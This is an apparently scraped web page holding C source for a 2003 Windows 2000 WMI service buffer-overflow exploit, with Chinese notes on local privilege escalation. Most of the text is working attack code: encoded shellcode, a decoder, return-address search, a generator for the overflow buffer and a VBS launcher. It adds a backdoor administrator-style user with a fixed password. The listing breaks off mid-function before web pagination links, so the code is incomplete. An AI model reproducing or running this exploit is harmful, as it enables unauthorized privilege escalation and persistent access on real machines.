WMIService -> CreateDirectoryExW -> RtlDosPathNameToNtPathName_U
wmi默认只有administrators才可以远程连接,所以只有能在目标系统上运行程序的用户才能利用。
本地用户可用来提升权限。
此程序可用于简体中文、繁体中文、日文、韩文系统sp0-3上。
不需要指定任何参数,程序会自动搜索可用的call ebx地址。
用c代码来与wmi service通讯太复杂了,所以程序是生成两个文件,一个是存放exploit buffer的
buff.txt,一个是xWMI.vbs。
/*----------------------------------------------------------*/
#include <windows.h>
#include <stdio.h>
#define NOPCODE 0x4F//0x4F//'O'
#define BUFFLEN (65536+8)/2
#define OVERPOINT 0x260//溢出点-0x14 SEH-0x4
int g_iCodePage;
char g_szDllList[5][16]={"kernel32.dll",
"advapi32.dll",
"user32.dll",
"gdi32.dll",
"ole32.dll"};
char *g_szWideCharShort;
unsigned char jmpover[]="\x41\x90\x41\x68";//0x41 inc ecx , 0x68 push num32
unsigned char decoder[]=
"\x4F\x75\x05\x74\x03\x4E\xC3\x4F\x53\x90\x5E\x66\xAD\x4E\x46\x4F"
"\x43\x66\x3D\x97\x6F\x90\x51\x90\x59\x75\xF0\x53\x56\x5F\x4A\x57"
"\x43\x66\xAD\x50\x43\x66\x3D\x4F\x00\x90\x59\x74\xD9\x4E\x2C\x64"
"\x50\x59\x46\x4F\x47\x90\x43\x66\xAD\x50\x4B\x58\x2C\x64\x4A\x57"
"\x51\x90\x90\x5F\x03\xFF\x03\xFF\x03\xFF\x03\xFF\x91\x03\xCF\x91"
"\x90\x5F\xAA\x90\x41\x74\xCA\x90\x51\x90\x59\x75\xC4\x4E\x97\x6F";
unsigned char xShellCode[]=
"iilorprojhinoldhddsekkleglhqinmdddkhdghlrosiloqllokggpdgsglokjkl
dgsglokrfddgsolo"
"hrehggrqijikielogsdgsolosfggpmlgpedrsgnjkhdlimislgpkdhhirfrkimi
sirlopqlohjfhdgpg"
"qeredgpeggpmjjlodllohjepdgpgperedfdgpelodddgpgrodfrogklosnlosfl
mdjlgpkdsikigssqd"
"lgpjdhlmdjlgpkdlikiglohjspssqdlgpjdhlmdjggpdidlgpkdjiklohjspssq
dolssssssssidlodj"
"ssqdrlirsssssshkjikhidkfjsjghejhjhkfjikgkgddikjmjrhikljijgddigj
pjijikdddjgjqjhfd"
"fsjgfdjrjikhfrjikljifdkikgjikffdklklfdgejefefrgmjrhlfdfsjejhjhf
dfjfjfdjrjikhfdjp"
"jsjgjejpjkkfjskikdfdjejhjqjmjrjmkgkhkfjekhjskfkgfdklklfdfsjejhjhdd";
int SearchRET();
BOOL MakeWideCharList();
DWORD WINAPI func(LPVOID lp);
void main()
{
int retaddr,i,j,iPathLen, iwLen;
unsigned char *pStr, widecharbuff[0x500], multibytebuff[0x500];
unsigned char szVBS[0x1000], szPath[256], szPath2[256];
FILE *f;
printf( "xWMI -> win2k WMI service buffer overflow exploit\n"
"WMIService -> CreateDirectoryExW -> RtlDosPathNameToNtPathName_U\n"
"for win2k which default codepage is GB、BIG5、Korean、JP sp0-3\n"
"Written by ey4s<cooleyas@21cn.com>\n"
"2003-04-27\n"
"thanks to yuange\n\n");
MakeWideCharList();
retaddr = SearchRET();
if(!retaddr) return;
pStr = (unsigned char *)malloc(40000);
memset(pStr, 0, 40000);
//get current path
iPathLen = GetCurrentDirectoryA(sizeof(szPath)-1, szPath);
if(!iPathLen)
{
printf("GetCurrentDirectoryA failed:%d\n", GetLastError());
return;
}
/*转换字符*/
memset(widecharbuff, 0, sizeof(widecharbuff));
//jmp over
memcpy(widecharbuff,jmpover,4);
//jmp addr
memcpy(widecharbuff+4,&retaddr,4);
//decoder
memcpy(widecharbuff+8,decoder,sizeof(decoder));
iwLen=wcslen((unsigned short *)widecharbuff);
i=WideCharToMultiByte(g_iCodePage,0,(unsigned short *)widecharbuff,
iwLen*2,multibytebuff,0x1000,0,0);
i=strlen(multibytebuff);
//组合buffer
memset(pStr, NOPCODE, BUFFLEN+iwLen);
memcpy(pStr, szPath, iPathLen);
pStr[iPathLen]=(BYTE)'\\';
//jmpover & jmpaddr
memcpy(pStr+OVERPOINT/2, multibytebuff, i);
//real shellcode
memcpy(pStr+OVERPOINT/2+i, xShellCode, strlen(xShellCode));
f = fopen("buff.txt", "w");
fprintf(f, "%s", pStr);
fclose(f);
free(pStr);
printf("write exploit buffer to file %s\\buff.txt\n", szPath);
//replace '\' to '\\'
memset(szPath2, 0, sizeof(szPath2));
for(i=0,j=0;i<strlen(szPath);i++,j++)
{
if(szPath[i]==(BYTE)'\\')
szPath2[j++]=szPath[i];
szPath2[j]=szPath[i];
}
sprintf(szVBS, "Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"
"set f2=fso.OpenTextFile(\"buff.txt\",1,false,TristateTrue)\n"
"szBuffer=f2.ReadAll\n"
"f2.Close\n"
"Set fso = Nothing\n"
"Set ServiceSet = GetObject(\"winmgmts:{impersonationLevel=impersonate}\")._\n"
"ExecQuery(\"select * from Win32_Directory where Name='%s'\")\n"
"for each Service in ServiceSet\n"
" WScript.Echo \"if you can see thie line,it maybe success!\"\n"
" Service.Copy(szBuffer)\n"
"next\n"
,szPath2);
f = fopen("xWMI.vbs", "w");
fprintf(f, "%s", szVBS);
fclose(f);
printf("create exploit execute file %s\\xWMI.vbs\n", szPath);
printf( "Execute exploit file %s\\xWMI.vbs\n"
"if success, exploit will add a
user xx password is 1a!.9nH\n", szPath);
CreateThread(0, 0, func, NULL, 0, NULL);
Sleep(20000);
DeleteFile("buff.txt");
DeleteFile("xWMI.vbs");
printf("Done.\n");
return;
}
DWORD WINAPI func(LPVOID lp)
{
system("cscript.exe xWMI.vbs");
return 0;
}
BOOL MakeWideCharList()
{
int iCodePage,i,j,ret;
char szCodePage[128];
unsigned char wbuff[4];
unsigned char wbuff2[4];
unsigned char buff[4];
if(!GetLocaleInfo(LOCALE_SYSTEM_DEFAULT, LOCALE_IDEFAULTCODEPAGE,
szCodePage, sizeof(szCodePage)-1))
{
printf("GetLocaleInfo failed:%d\n", GetLastError());
&[1] [2] [3] 下一页 |
